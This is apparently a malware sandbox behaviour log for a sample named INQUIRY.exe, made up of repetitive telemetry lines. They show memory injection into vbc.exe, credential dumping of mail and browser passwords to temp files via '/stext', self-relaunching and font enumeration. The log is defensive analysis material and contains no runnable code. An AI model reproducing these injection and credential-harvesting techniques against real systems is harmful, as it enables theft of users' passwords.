                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405CA0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,GetACP,0_2_0040AD50
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,0_2_004099D4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,0_2_00409A20
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405DAC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405CA0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,GetACP,0_2_0040AD50
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,0_2_004099D4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,0_2_00409A20
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405DAC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,1_2_0048EA4A
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_00405CA0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,GetACP,2_2_0040AD50
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,2_2_004099D4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,2_2_00409A20
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_00405DAC
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
